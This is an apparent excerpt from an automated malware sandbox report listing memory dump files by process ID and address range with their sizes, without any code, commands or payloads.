                                                                                                                    • memory/3532-273-0x00000000052E0000-0x000000000537C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      624KB

                                                                                                                    • memory/3676-342-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/4048-243-0x00000000729C0000-0x0000000073170000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/4048-244-0x0000000000120000-0x000000000014E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      184KB

                                                                                                                    • memory/4220-288-0x0000000002860000-0x0000000002861000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-281-0x0000000002680000-0x0000000002681000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-286-0x0000000000400000-0x00000000007E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/4220-285-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-283-0x0000000003580000-0x0000000003581000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-280-0x00000000028A0000-0x00000000028A1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-290-0x00000000028D0000-0x00000000028D1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4220-287-0x0000000000400000-0x00000000007E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/4220-282-0x0000000000400000-0x00000000007E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/4220-292-0x0000000000400000-0x00000000007E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/4220-293-0x0000000002890000-0x0000000002891000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4488-271-0x0000000002100000-0x0000000002160000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      384KB

                                                                                                                    • memory/4604-372-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      120KB

                                                                                                                    • memory/4624-326-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/4708-304-0x0000000070B30000-0x0000000070BB9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      548KB

                                                                                                                    • memory/4708-275-0x00000000030B0000-0x00000000030F6000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      280KB

                                                                                                                    • memory/4708-276-0x0000000076E00000-0x0000000077015000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.1MB

                                                                                                                    • memory/4708-266-0x0000000002F70000-0x0000000002F71000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4708-260-0x0000000001600000-0x0000000001601000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4800-196-0x00000000007F8000-0x000000000085D000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      404KB

                                                                                                                    • memory/4800-215-0x0000000000400000-0x00000000004AC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      688KB

                                                                                                                    • memory/4800-213-0x0000000000730000-0x00000000007CD000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      628KB

                                                                                                                    • memory/4800-212-0x00000000007F8000-0x000000000085D000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      404KB

                                                                                                                    • memory/5112-284-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/5112-289-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/5112-295-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                    • memory/5112-291-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.9MB